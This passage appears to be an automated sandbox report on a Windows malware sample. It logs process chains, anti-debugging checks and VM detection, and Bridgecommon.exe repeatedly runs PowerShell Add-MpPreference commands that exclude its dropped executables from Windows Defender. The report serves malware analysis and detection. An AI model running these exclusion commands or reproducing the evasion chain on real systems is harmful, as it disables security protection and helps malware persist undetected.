                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: wscript.exe, 00000001.00000003.1860581072.000000000302C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: Bridgecommon.exe, 00000005.00000002.1978082976.000000001C62E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: Bridgecommon.exe, 00000005.00000002.1979197436.000000001C661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA
                                    Source: w32tm.exe, 00000030.00000002.1976106969.00000191C2818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeAPI call chain: ExitProcess graph end nodegraph_0-25001
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CBF838
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CC7DEE mov eax, dword ptr fs:[00000030h]0_2_00CC7DEE
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CCC030 GetProcessHeap,0_2_00CCC030
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess token adjusted: Debug
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess token adjusted: Debug
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeProcess token adjusted: Debug
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeProcess token adjusted: Debug
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CBF838
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBF9D5 SetUnhandledExceptionFilter,0_2_00CBF9D5
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CBFBCA
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CC8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CC8EBD
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Adds a directory exclusion to Windows Defender
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\hyperContaineragent\Bridgecommon.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\hyperContaineragent\Bridgecommon.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperContaineragent\CYWN6IDJqLBtl0YjSrMSw1hYURgrvXzRLx.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\hyperContaineragent\Bridgecommon.exe "C:\hyperContaineragent/Bridgecommon.exe"Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline"Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\hyperContaineragent\Bridgecommon.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4DA.tmp" "c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe"
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBF654 cpuid 0_2_00CBF654
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00CBAF0F
                                    Source: C:\hyperContaineragent\Bridgecommon.exeQueries volume information: C:\hyperContaineragent\Bridgecommon.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
